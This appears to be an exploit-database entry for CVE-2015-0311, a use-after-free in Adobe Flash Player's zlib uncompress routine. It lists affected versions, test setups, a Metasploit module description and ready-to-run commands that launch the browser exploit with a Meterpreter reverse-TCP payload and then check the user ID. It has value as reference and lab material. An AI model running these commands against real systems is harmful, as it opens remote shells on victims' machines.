CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested onĀ :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid